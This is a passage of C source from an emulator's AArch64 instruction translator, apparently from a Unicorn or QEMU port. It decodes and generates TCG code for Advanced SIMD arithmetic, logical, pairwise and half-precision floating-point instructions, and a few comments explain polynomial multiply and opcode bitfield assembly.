tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } static void do_narrow_round_high_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i64 in) { tcg_gen_addi_i64(tcg_ctx, in, in, 1U << 31); tcg_gen_extrh_i64_i32(tcg_ctx, res, in); } static void handle_3rd_narrowing(DisasContext *s, int is_q, int is_u, int size, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_res[2]; int part = is_q ? 
2 : 0; int pass; for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_wideres = tcg_temp_new_i64(tcg_ctx); static NeonGenNarrowFn * const narrowfns[3][2] = { { gen_helper_neon_narrow_high_u8, gen_helper_neon_narrow_round_high_u8 }, { gen_helper_neon_narrow_high_u16, gen_helper_neon_narrow_round_high_u16 }, { tcg_gen_extrh_i64_i32, do_narrow_round_high_u32 }, }; NeonGenNarrowFn *gennarrow = narrowfns[size][is_u]; read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); gen_neon_addl(tcg_ctx, size, (opcode == 6), tcg_wideres, tcg_op1, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); gennarrow(tcg_ctx, tcg_res[pass], tcg_wideres); tcg_temp_free_i64(tcg_ctx, tcg_wideres); } for (pass = 0; pass < 2; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass + part, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } clear_vec_high(s, is_q, rd); } /* AdvSIMD three different * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+--------+-----+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 0 0 | Rn | Rd | * +---+---+---+-----------+------+---+------+--------+-----+------+------+ */ static void disas_simd_three_reg_diff(DisasContext *s, uint32_t insn) { /* Instructions in this group fall into three basic classes * (in each case with the operation working on each element in * the input vectors): * (1) widening 64 x 64 -> 128 (with possibly Vd as an extra * 128 bit input) * (2) wide 64 x 128 -> 128 * (3) narrowing 128 x 128 -> 64 * Here we do initial decode, catch unallocated cases and * dispatch to separate functions for each class. */ int is_q = extract32(insn, 30, 1); int is_u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 4); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); switch (opcode) { case 1: /* SADDW, SADDW2, UADDW, UADDW2 */ case 3: /* SSUBW, SSUBW2, USUBW, USUBW2 */ /* 64 x 128 -> 128 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3rd_wide(s, is_q, is_u, size, opcode, rd, rn, rm); break; case 4: /* ADDHN, ADDHN2, RADDHN, RADDHN2 */ case 6: /* SUBHN, SUBHN2, RSUBHN, RSUBHN2 */ /* 128 x 128 -> 64 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3rd_narrowing(s, is_q, is_u, size, opcode, rd, rn, rm); break; case 14: /* PMULL, PMULL2 */ if (is_u) { unallocated_encoding(s); return; } switch (size) { case 0: /* PMULL.P8 */ if (!fp_access_check(s)) { return; } /* The Q field specifies lo/hi half input for this insn. */ gen_gvec_op3_ool(s, true, rd, rn, rm, is_q, gen_helper_neon_pmull_h); break; case 3: /* PMULL.P64 */ if (!dc_isar_feature(aa64_pmull, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* The Q field specifies lo/hi half input for this insn. 
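 *
 * Illustrative aside (not part of the decoder): PMULL is a carry-less
 * ("polynomial") multiply, i.e. a shift-and-XOR product with no carries
 * between bit positions; PMULL.P64 applies the same operation to 64-bit
 * lanes, giving a 128-bit product. A minimal scalar model of the 8-bit
 * variant, assuming only C99 integer types:
 *
 *     #include <stdint.h>
 *
 *     static uint16_t pmull8(uint8_t a, uint8_t b)
 *     {
 *         uint16_t result = 0;
 *         for (int i = 0; i < 8; i++) {
 *             if (b & (1u << i)) {
 *                 result ^= (uint16_t)a << i;  // XOR in place of ADD
 *             }
 *         }
 *         return result;
 *     }
 *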
*/ gen_gvec_op3_ool(s, true, rd, rn, rm, is_q, gen_helper_gvec_pmull_q); break; default: unallocated_encoding(s); break; } return; case 9: /* SQDMLAL, SQDMLAL2 */ case 11: /* SQDMLSL, SQDMLSL2 */ case 13: /* SQDMULL, SQDMULL2 */ if (is_u || size == 0) { unallocated_encoding(s); return; } /* fall through */ case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ case 12: /* SMULL, SMULL2, UMULL, UMULL2 */ /* 64 x 64 -> 128 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3rd_widening(s, is_q, is_u, size, opcode, rd, rn, rm); break; default: /* opcode 15 not allocated */ unallocated_encoding(s); break; } } /* Logic op (opcode == 3) subgroup of C3.6.16. */ static void disas_simd_3same_logic(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool is_u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); if (!fp_access_check(s)) { return; } switch (size + 4 * is_u) { case 0: /* AND */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_and, 0); return; case 1: /* BIC */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_andc, 0); return; case 2: /* ORR */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_or, 0); return; case 3: /* ORN */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_orc, 0); return; case 4: /* EOR */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_xor, 0); return; case 5: /* BSL bitwise select */ gen_gvec_fn4(s, is_q, rd, rd, rn, rm, tcg_gen_gvec_bitsel, 0); return; case 6: /* BIT, bitwise insert if true */ gen_gvec_fn4(s, is_q, rd, rm, rn, rd, tcg_gen_gvec_bitsel, 0); return; case 7: /* BIF, bitwise insert if false */ gen_gvec_fn4(s, is_q, rd, rm, rd, rn, tcg_gen_gvec_bitsel, 0); return; default: g_assert_not_reached(); } } /* Pairwise op subgroup of C3.6.16. * * This is called directly or via the handle_3same_float for float pairwise * operations where the opcode and size are calculated differently. */ static void handle_simd_3same_pair(DisasContext *s, int is_q, int u, int opcode, int size, int rn, int rm, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; int pass; /* Floating point operations need fpst */ if (opcode >= 0x58) { fpst = get_fpstatus_ptr(tcg_ctx, false); } else { fpst = NULL; } if (!fp_access_check(s)) { return; } /* These operations work on the concatenated rm:rn, with each pair of * adjacent elements being operated on to produce an element in the result. */ if (size == 3) { TCGv_i64 tcg_res[2]; for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); int passreg = (pass == 0) ? 
rn : rm; read_vec_element(s, tcg_op1, passreg, 0, MO_64); read_vec_element(s, tcg_op2, passreg, 1, MO_64); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); switch (opcode) { case 0x17: /* ADDP */ tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); break; case 0x58: /* FMAXNMP */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5a: /* FADDP */ gen_helper_vfp_addd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5e: /* FMAXP */ gen_helper_vfp_maxd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x78: /* FMINNMP */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x7e: /* FMINP */ gen_helper_vfp_mind(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } else { int maxpass = is_q ? 4 : 2; TCGv_i32 tcg_res[4]; for (pass = 0; pass < maxpass; pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); NeonGenTwoOpFn *genfn = NULL; int passreg = pass < (maxpass / 2) ? rn : rm; int passelt = (is_q && (pass & 1)) ? 2 : 0; read_vec_element_i32(s, tcg_op1, passreg, passelt, MO_32); read_vec_element_i32(s, tcg_op2, passreg, passelt + 1, MO_32); tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x17: /* ADDP */ { static NeonGenTwoOpFn * const fns[3] = { gen_helper_neon_padd_u8, gen_helper_neon_padd_u16, tcg_gen_add_i32, }; genfn = fns[size]; break; } case 0x14: /* SMAXP, UMAXP */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_pmax_s8, gen_helper_neon_pmax_u8 }, { gen_helper_neon_pmax_s16, gen_helper_neon_pmax_u16 }, { tcg_gen_smax_i32, tcg_gen_umax_i32 }, }; genfn = fns[size][u]; break; } case 0x15: /* SMINP, UMINP */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_pmin_s8, gen_helper_neon_pmin_u8 }, { gen_helper_neon_pmin_s16, gen_helper_neon_pmin_u16 }, { tcg_gen_smin_i32, tcg_gen_umin_i32 }, }; genfn = fns[size][u]; break; } /* The FP operations are all on single floats (32 bit) */ case 0x58: /* FMAXNMP */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5a: /* FADDP */ gen_helper_vfp_adds(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x5e: /* FMAXP */ gen_helper_vfp_maxs(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x78: /* FMINNMP */ gen_helper_vfp_minnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x7e: /* FMINP */ gen_helper_vfp_mins(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } /* FP ops called directly, otherwise call now */ if (genfn) { genfn(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); } tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } for (pass = 0; pass < maxpass; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } clear_vec_high(s, is_q, rd); } if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } } /* Floating point op subgroup of C3.6.16. */ static void disas_simd_3same_float(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* For floating point ops, the U, size[1] and opcode bits * together indicate the operation. size[0] indicates single * or double. 
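 *
 * Illustrative aside (not part of the decoder): extract32(x, pos, len)
 * is QEMU's bitfield helper, returning the len-bit field of x starting
 * at bit pos, so the 7-bit fpopcode below is assembled as
 * U:size[1]:opcode[4:0]. A minimal standalone model of that
 * composition:
 *
 *     #include <stdint.h>
 *
 *     static uint32_t extract_bits(uint32_t x, int pos, int len)
 *     {
 *         return (x >> pos) & ((1u << len) - 1);
 *     }
 *
 *     static uint32_t make_fpopcode(uint32_t insn)
 *     {
 *         return extract_bits(insn, 11, 5)           // opcode
 *              | (extract_bits(insn, 23, 1) << 5)    // size[1]
 *              | (extract_bits(insn, 29, 1) << 6);   // U
 *     }
 *
 * For example, FADDP encodes U=1, size[1]=0, opcode=0x1a, giving
 * fpopcode 0x5a as matched in the switch below.
 *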
*/ int fpopcode = extract32(insn, 11, 5) | (extract32(insn, 23, 1) << 5) | (extract32(insn, 29, 1) << 6); int is_q = extract32(insn, 30, 1); int size = extract32(insn, 22, 1); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int datasize = is_q ? 128 : 64; int esize = 32 << size; int elements = datasize / esize; if (size == 1 && !is_q) { unallocated_encoding(s); return; } switch (fpopcode) { case 0x58: /* FMAXNMP */ case 0x5a: /* FADDP */ case 0x5e: /* FMAXP */ case 0x78: /* FMINNMP */ case 0x7e: /* FMINP */ if (size && !is_q) { unallocated_encoding(s); return; } handle_simd_3same_pair(s, is_q, 0, fpopcode, size ? MO_64 : MO_32, rn, rm, rd); return; case 0x1b: /* FMULX */ case 0x1f: /* FRECPS */ case 0x3f: /* FRSQRTS */ case 0x5d: /* FACGE */ case 0x7d: /* FACGT */ case 0x19: /* FMLA */ case 0x39: /* FMLS */ case 0x18: /* FMAXNM */ case 0x1a: /* FADD */ case 0x1c: /* FCMEQ */ case 0x1e: /* FMAX */ case 0x38: /* FMINNM */ case 0x3a: /* FSUB */ case 0x3e: /* FMIN */ case 0x5b: /* FMUL */ case 0x5c: /* FCMGE */ case 0x5f: /* FDIV */ case 0x7a: /* FABD */ case 0x7c: /* FCMGT */ if (!fp_access_check(s)) { return; } handle_3same_float(s, size, elements, fpopcode, rd, rn, rm); return; case 0x1d: /* FMLAL */ case 0x3d: /* FMLSL */ case 0x59: /* FMLAL2 */ case 0x79: /* FMLSL2 */ if (size & 1 || !dc_isar_feature(aa64_fhm, s)) { unallocated_encoding(s); return; } if (fp_access_check(s)) { int is_s = extract32(insn, 23, 1); int is_2 = extract32(insn, 29, 1); int data = (is_2 << 1) | is_s; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), tcg_ctx->cpu_env, is_q ? 16 : 8, vec_full_reg_size(s), data, gen_helper_gvec_fmlal_a64); } return; default: unallocated_encoding(s); return; } } /* Integer op subgroup of C3.6.16. */ static void disas_simd_3same_int(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int is_q = extract32(insn, 30, 1); int u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 11, 5); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int pass; TCGCond cond; switch (opcode) { case 0x13: /* MUL, PMUL */ if (u && size != 0) { unallocated_encoding(s); return; } /* fall through */ case 0x0: /* SHADD, UHADD */ case 0x2: /* SRHADD, URHADD */ case 0x4: /* SHSUB, UHSUB */ case 0xc: /* SMAX, UMAX */ case 0xd: /* SMIN, UMIN */ case 0xe: /* SABD, UABD */ case 0xf: /* SABA, UABA */ case 0x12: /* MLA, MLS */ if (size == 3) { unallocated_encoding(s); return; } break; case 0x16: /* SQDMULH, SQRDMULH */ if (size == 0 || size == 3) { unallocated_encoding(s); return; } break; default: if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; } if (!fp_access_check(s)) { return; } switch (opcode) { case 0x01: /* SQADD, UQADD */ tcg_gen_gvec_4(tcg_ctx, vec_full_reg_offset(s, rd), offsetof(CPUARMState, vfp.qc), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), (u ? uqadd_op : sqadd_op) + size); return; case 0x05: /* SQSUB, UQSUB */ tcg_gen_gvec_4(tcg_ctx, vec_full_reg_offset(s, rd), offsetof(CPUARMState, vfp.qc), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), (u ? uqsub_op : sqsub_op) + size); return; case 0x08: /* SSHL, USHL */ gen_gvec_op3(s, is_q, rd, rn, rm, u ? 
&ushl_op[size] : &sshl_op[size]); return; case 0x0c: /* SMAX, UMAX */ if (u) { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_umax, size); } else { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_smax, size); } return; case 0x0d: /* SMIN, UMIN */ if (u) { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_umin, size); } else { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_smin, size); } return; case 0x10: /* ADD, SUB */ if (u) { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_sub, size); } else { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_add, size); } return; case 0x13: /* MUL, PMUL */ if (!u) { /* MUL */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_mul, size); } else { /* PMUL */ gen_gvec_op3_ool(s, is_q, rd, rn, rm, 0, gen_helper_gvec_pmul_b); } return; case 0x12: /* MLA, MLS */ if (u) { gen_gvec_op3(s, is_q, rd, rn, rm, &mls_op[size]); } else { gen_gvec_op3(s, is_q, rd, rn, rm, &mla_op[size]); } return; case 0x11: if (!u) { /* CMTST */ gen_gvec_op3(s, is_q, rd, rn, rm, &cmtst_op[size]); return; } /* else CMEQ */ cond = TCG_COND_EQ; goto do_gvec_cmp; case 0x06: /* CMGT, CMHI */ cond = u ? TCG_COND_GTU : TCG_COND_GT; goto do_gvec_cmp; case 0x07: /* CMGE, CMHS */ cond = u ? TCG_COND_GEU : TCG_COND_GE; do_gvec_cmp: tcg_gen_gvec_cmp(tcg_ctx, cond, size, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s)); return; } if (size == 3) { assert(is_q); for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); handle_3same_64(s, opcode, u, tcg_res, tcg_op1, tcg_op2); write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } } else { for (pass = 0; pass < (is_q ? 
4 : 2); pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); NeonGenTwoOpFn *genfn = NULL; NeonGenTwoOpEnvFn *genenvfn = NULL; read_vec_element_i32(s, tcg_op1, rn, pass, MO_32); read_vec_element_i32(s, tcg_op2, rm, pass, MO_32); switch (opcode) { case 0x0: /* SHADD, UHADD */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_hadd_s8, gen_helper_neon_hadd_u8 }, { gen_helper_neon_hadd_s16, gen_helper_neon_hadd_u16 }, { gen_helper_neon_hadd_s32, gen_helper_neon_hadd_u32 }, }; genfn = fns[size][u]; break; } case 0x2: /* SRHADD, URHADD */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_rhadd_s8, gen_helper_neon_rhadd_u8 }, { gen_helper_neon_rhadd_s16, gen_helper_neon_rhadd_u16 }, { gen_helper_neon_rhadd_s32, gen_helper_neon_rhadd_u32 }, }; genfn = fns[size][u]; break; } case 0x4: /* SHSUB, UHSUB */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_hsub_s8, gen_helper_neon_hsub_u8 }, { gen_helper_neon_hsub_s16, gen_helper_neon_hsub_u16 }, { gen_helper_neon_hsub_s32, gen_helper_neon_hsub_u32 }, }; genfn = fns[size][u]; break; } case 0x9: /* SQSHL, UQSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0xa: /* SRSHL, URSHL */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_rshl_s8, gen_helper_neon_rshl_u8 }, { gen_helper_neon_rshl_s16, gen_helper_neon_rshl_u16 }, { gen_helper_neon_rshl_s32, gen_helper_neon_rshl_u32 }, }; genfn = fns[size][u]; break; } case 0xb: /* SQRSHL, UQRSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0xe: /* SABD, UABD */ case 0xf: /* SABA, UABA */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_abd_s8, gen_helper_neon_abd_u8 }, { gen_helper_neon_abd_s16, gen_helper_neon_abd_u16 }, { gen_helper_neon_abd_s32, gen_helper_neon_abd_u32 }, }; genfn = fns[size][u]; break; } case 0x16: /* SQDMULH, SQRDMULH */ { static NeonGenTwoOpEnvFn * const fns[2][2] = { { gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, }; assert(size == 1 || size == 2); genenvfn = fns[size - 1][u]; break; } default: g_assert_not_reached(); } if (genenvfn) { genenvfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op1, tcg_op2); } else { genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2); } if (opcode == 0xf) { /* SABA, UABA: accumulating ops */ static NeonGenTwoOpFn * const fns[3] = { gen_helper_neon_add_u8, gen_helper_neon_add_u16, tcg_gen_add_i32, }; read_vec_element_i32(s, tcg_op1, rd, pass, MO_32); fns[size](tcg_ctx, tcg_res, tcg_op1, tcg_res); } write_vec_element_i32(s, tcg_res, rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } } clear_vec_high(s, is_q, rd); } /* AdvSIMD three same * 31 30 29 28 24 23 22 21 20 16 15 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+--------+---+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | * +---+---+---+-----------+------+---+------+--------+---+------+------+ */ static void 
disas_simd_three_reg_same(DisasContext *s, uint32_t insn) { int opcode = extract32(insn, 11, 5); switch (opcode) { case 0x3: /* logic ops */ disas_simd_3same_logic(s, insn); break; case 0x17: /* ADDP */ case 0x14: /* SMAXP, UMAXP */ case 0x15: /* SMINP, UMINP */ { /* Pairwise operations */ int is_q = extract32(insn, 30, 1); int u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); if (opcode == 0x17) { if (u || (size == 3 && !is_q)) { unallocated_encoding(s); return; } } else { if (size == 3) { unallocated_encoding(s); return; } } handle_simd_3same_pair(s, is_q, u, opcode, size, rn, rm, rd); break; } case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: case 0x30: case 0x31: /* floating point ops, sz[1] and U are part of opcode */ disas_simd_3same_float(s, insn); break; default: disas_simd_3same_int(s, insn); break; } } /* * Advanced SIMD three same (ARMv8.2 FP16 variants) * * 31 30 29 28 24 23 22 21 20 16 15 14 13 11 10 9 5 4 0 * +---+---+---+-----------+---------+------+-----+--------+---+------+------+ * | 0 | Q | U | 0 1 1 1 0 | a | 1 0 | Rm | 0 0 | opcode | 1 | Rn | Rd | * +---+---+---+-----------+---------+------+-----+--------+---+------+------+ * * This includes FMULX, FCMEQ (register), FRECPS, FRSQRTS, FCMGE * (register), FACGE, FABD, FCMGT (register) and FACGT. * */ static void disas_simd_three_reg_same_fp16(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode, fpopcode; int is_q, u, a, rm, rn, rd; int datasize, elements; int pass; TCGv_ptr fpst; bool pairwise = false; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* For these floating point ops, the U, a and opcode bits * together indicate the operation. */ opcode = extract32(insn, 11, 3); u = extract32(insn, 29, 1); a = extract32(insn, 23, 1); is_q = extract32(insn, 30, 1); rm = extract32(insn, 16, 5); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); fpopcode = opcode | (a << 3) | (u << 4); datasize = is_q ? 128 : 64; elements = datasize / 16; switch (fpopcode) { case 0x10: /* FMAXNMP */ case 0x12: /* FADDP */ case 0x16: /* FMAXP */ case 0x18: /* FMINNMP */ case 0x1e: /* FMINP */ pairwise = true; break; } fpst = get_fpstatus_ptr(tcg_ctx, true); if (pairwise) { int maxpass = is_q ? 8 : 4; TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res[8]; for (pass = 0; pass < maxpass; pass++) { int passreg = pass < (maxpass / 2) ? 
rn : rm; int passelt = (pass << 1) & (maxpass - 1); read_vec_element_i32(s, tcg_op1, passreg, passelt, MO_16); read_vec_element_i32(s, tcg_op2, passreg, passelt + 1, MO_16); tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); switch (fpopcode) { case 0x10: /* FMAXNMP */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x12: /* FADDP */ gen_helper_advsimd_addh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x16: /* FMAXP */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x18: /* FMINNMP */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x1e: /* FMINP */ gen_helper_advsimd_minh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } } for (pass = 0; pass < maxpass; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_16); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } else { for (pass = 0; pass < elements; pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op1, rn, pass, MO_16); read_vec_element_i32(s, tcg_op2, rm, pass, MO_16); switch (fpopcode) { case 0x0: /* FMAXNM */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FMLA */ read_vec_element_i32(s, tcg_res, rd, pass, MO_16); gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0x2: /* FADD */ gen_helper_advsimd_addh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FMULX */ gen_helper_advsimd_mulxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FCMEQ */ gen_helper_advsimd_ceq_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAX */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FRECPS */ gen_helper_recpsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x8: /* FMINNM */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x9: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ tcg_gen_xori_i32(tcg_ctx, tcg_op1, tcg_op1, 0x8000); read_vec_element_i32(s, tcg_res, rd, pass, MO_16); gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0xa: /* FSUB */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xe: /* FMIN */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FRSQRTS */ gen_helper_rsqrtsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x13: /* FMUL */ 